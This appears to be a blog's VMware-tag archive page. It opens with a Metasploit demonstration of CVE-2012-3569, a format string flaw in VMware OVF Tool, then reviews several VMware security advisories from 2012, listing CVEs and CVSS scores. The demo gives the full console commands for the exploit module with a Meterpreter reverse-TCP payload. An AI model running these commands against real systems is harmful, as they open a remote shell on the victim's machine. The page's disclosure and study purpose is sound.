Tag Archives: VMware

CVE-2012-3569 VMWare OVF Tool Format String Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Jeremy Brown of Microsoft
Coordinated public release of the vulnerability the 2012-11-08
Metasploit PoC provided the 2013-02-04

PoC provided by :

Jeremy Brown
juan vazquez

Reference(s) :

CVE-2012-3569
OSVDB-87117
BID-56468
VMSA-2012-0015

Affected version(s) :

VMware OVF Tool 2.1 and earlier for Windows
VMware Workstation 8.0.5 and earlier for Windows
VMware Player 4.0.4 and earlier for Windows

Tested on Windows XP Pro SP3 with :

VMware OVF Tool 2.1

Description :

This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.

Commands :

use exploit/windows/browser/ovftool_format_string
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

VMware Security Advisory VMSA-2012-0016 Review

VMware has release,the 15 November 2012, one security advisory VMSA-2012-0016 concerning VMware vSphere API and ESX service console.

VMware vSphere API denial of service vulnerability

The VMware vSphere API is affected by one vulnerability, CVE-2012-5703, with a 5.0 CVSS base score. The vulnerability was discovered and privately reported by Sebastián Tullo of Core Security Technologies. ESXi and ESX 4.1 are affected by this vulnerability.

VMware vSphere API denial of service vulnerability

ESX 4.1 bind-libs and bind-utils packages have been updated in order to fix multiples vulnerabilities. CVE-2012-1033 has a 5.0 CVSS base score  , CVE-2012-1667 has a 8.5 CVSS base score and CVE-2012-3817 has a 7.8 CVSS base score. ESX 4.0 is affected and the patch will be released further.

Update to ESX service console python packages

ESX 4.1 python and python-libs packages have been updated in order to fix multiples vulnerabilities. CVE-2011-4940 has a 2.6 CVSS base score, CVE-2011-4944 has a 1.9 CVSS base score and CVE-2012-1150 has a 5.0 CVSS base score. ESX 4.0 is affected but no patch is planned.

Update to ESX service console expat package

ESX 4.1 expat package has been updated in order to fix two vulnerabilities. CVE-2012-0876 has a 4.3 CVSS base score and CVE-2012-1148 has a 5.0 CVSS base score. ESX 4.0 is affected but no patch is planned.

Update to ESX service console nspr and nss packages

ESX 4.1 nspr and nss packages have been updated in order to fix two vulnerabilities. CVE-2012-0441 has a 5.0 CVSS base score and this patch also resolves a certificate trust issue caused by a fraudulent DigiNotar root certificate. ESX 4.0 is affected and the patch will be released further.

VMware Security Advisory VMSA-2012-0014 Review

VMware has release,the 04 October 2012, one security advisory VMSA-2012-0014 concerning VMware vCenter Operation, vCenter CapacityIQ and Movie Decoder.

VMware Movie Decoder Installer binary planting vulnerability

VMware Movie Decoder is affected by one vulnerability, CVE-2012-4897, with a 6.9 CVSS base score. The vulnerability was discovered and reported by Mitja Kolsek of ACROS Security. Movie Decoder previous to version 9.0 are affected.

vCenter Operations cross-site scripting vulnerability

vCenter Operations is affected by a XSS vulnerability, CVE-2012-5050, with a 4.3 CVSS base score. The vulnerability was discovered and reported by Alexander Minozhenko of ERPScan. vCOps previous to version 5.0.x are affected.

vCenter CapacityIQ path traversal vulnerability

vCenter CapacityIQ is affected by a path traversal vulnerability, CVE-2012-5051, with a 5.0 CVSS base score. The vulnerability was discovered and reported by Alexander Minozhenko of ERPScan. CapacityIQ previous to vCOps 5.0.x are affected.

VMware Security Advisory VMSA-2012-0013 Review

VMware has release,the 30 August 2012, one security advisory VMSA-2012-0013 concerning VMware vSphere and vCOps updates to third-party libraries.

vCenter and ESX update to JRE 1.6.0 Update 31

Oracle Java used in vCenter and ESX are updated to JRE 1.6.0 Update 31 how fix multiple vulnerabilities patched during Oracle Java SE CPU of February 2012. Oracle Java SE CPU of Jun 2012 is still not pushed to be updated, with 14 vulnerabilities and 9 of these 14 vulnerabilities have a CVSS base score upper to 7.0. Also known exploit for vulnerability CVE-2012-1723 is still active. Also CVE-2012-0547 fixed the 30 August 2012 Oracle Security alert is not fixed, but CVSS base score of this vulnerability is 0.0.

vCenter 4.1 and ESX 4.1 are affected by this update, but no patch are available for vCenter 5.0 and Update Manager 5.0, the patches are pending.

vCenter Update Manager update to JRE 1.5.0 Update 36

Oracle Java used in vCenter and ESX are update to JRE 1.5.0 Update 36 how fix multiple vulnerabilities patched during Oracle Java SE CPU of Jun 2012. Update Manager 4.1 is affected by this update, but no patch are available for vCenter 4.0, VirtualCenter 2.5, Update Manager 4.0, ESX 4.0 and ESX 3.5, the patches are pending.

Update to ESX/ESXi userworld OpenSSL library

OpenSSL library used in ESX and ESXi are updated from version 0.9.8p to version 0.9.8t to resolve nine security issues. Two of these nine security issues have a CVSS base score upper to 7.0. ESXi 4.1 and ESX 4.1 are affected by this update, but no patch are available for ESXi 5.0, ESXi 4.0, ESXi 3.5, ESX 4.0 and ESX 3.5, the patches are pending.

Update to ESX service console OpenSSL RPM

OpenSSL RPM used in ESX is updated to version 0.9.8e-22.el5_8.3 to resolve a security issue. This security issue, CVE-2012-2110, has a CVSS base score of 7.5. ESX 4.1 is affected by this update, but no patch is available for ESX 4.0, the patch is pending.

Update to ESX service console kernel

kernel used in ESX is updated to resolve 14 security issues. 3 of these 14 security issues have a CVSS base score upper to 7.0, and CVE-2011-1833 and CVE-2011-3209 have an unknown CVSS base score. ESX 4.1 is affected by this update, but no patch is available for ESX 4.0, the patch is pending.

Update to ESX service console Perl RPM

Perl RPM used by ESX is updated to perl-5.8.8.32.1.8999.vmw to three multiple security issues. 1 of these 3 security issues has a CVSS base core of 7.5. ESX 4.1 is affected by this update, but no patch is available for ESX 4.0, the patch is pending.

Update to ESX service console libxml2 RPM

libxml2 RPM used by ESX is updated to libxml2-2.6.26-2.1.15.el5_8.2 and libxml2-python-2.6.26-2.1.15.el5_8.2 to resolve a security issue. This security issue, CVE-2012-0841, has an unknown CVSS base score. ESX 4.1 is affected by this update, but no patch is available for ESX 4.0, the patch is pending.

Update to ESX service console glibc RPM

glibc RPM used by ESX is updated to version glibc-2.5-81.el5_8.1 to resolve six security issues. CVE-2009-5029, CVE-2011-4609 and CVE-2012-0864 have an unknown CVSS base score. ESX 4.1 is affected by this update, but no patch is available for ESX 4.0, the patch is pending.

Update to ESX service console GnuTLS RPM

GnuTLS RPM used by ESX is updated to version 1.4.1-7.el5_8.2 to resolve three multiple security issues. ESX 4.1 is affected by this update, but no patch is available for ESX 4.0, the patch is pending.

Update to ESX service console popt, rpm, rpm-libs, and rpm-python RPMS

popt, rpm, rpm-libs and rpm-python used in ESX are updated to resolve three multiple security issues. ESX 4.1 is affected by this update, but no patch is available for ESX 4.0, the patch is pending.

Vulnerability in third-party Apache Struts component

Apache Strust used in vCOps to version 2.3.4 to resolve five multiple security issues. 2 of these 5 security issues have a CVSS base score of 9.3 with active exploits. vCOps 5.0.x and 1.0.x are affected by this patch.